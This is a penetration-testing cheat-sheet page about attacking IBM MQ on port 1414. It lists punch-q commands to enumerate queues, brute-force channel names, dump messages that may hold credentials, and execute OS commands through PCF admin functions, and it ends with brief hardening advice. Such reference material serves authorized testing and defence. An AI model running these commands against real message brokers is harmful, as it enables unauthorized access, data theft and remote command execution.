KagisoSec_
Service bank
SERVICE 1414/tcp

IBM MQ

aka websphere-mq, mqseries

IBM's enterprise message broker on 1414. Default server-connection channels often allow unauthenticated connections; from there you can enumerate queues, read messages, and run commands via PCF admin functions.

service message-queue enterprise

Ports

PortProtoNotes
1414tcpIBM MQ listener

Fingerprint

  • punch-q / pymqi connect and identify the queue manager
  • Default channel SYSTEM.DEF.SVRCONN present

Exploitation primitives

  • Connect over a default SVRCONN channel (often no auth)
  • Enumerate queues + read/peek messages (business data, creds)
  • Abuse PCF admin commands to create channels or execute commands

Overview

IBM MQ on 1414 brokers enterprise messages. The classic foothold is an open SYSTEM.DEF.SVRCONN channel that lets you connect and explore the queue manager.

Enumeration

Discover the queue manager + channels with punch-q:

punch-q --host <TARGET> --port 1414 show queues

Brute-force channel names if defaults are removed:

punch-q --host <TARGET> --port 1414 discover channels

Loot & execute

Dump messages from a queue (often business/credential data):

punch-q --host <TARGET> --channel SYSTEM.DEF.SVRCONN messages dump -q <QUEUE>

Command execution via PCF (where permitted):

punch-q --host <TARGET> --channel SYSTEM.ADMIN.SVRCONN command execute -c "id"

Hardening

Remove/disable default channels, enable CHLAUTH + connection authentication (MCAUSER), and require TLS.

References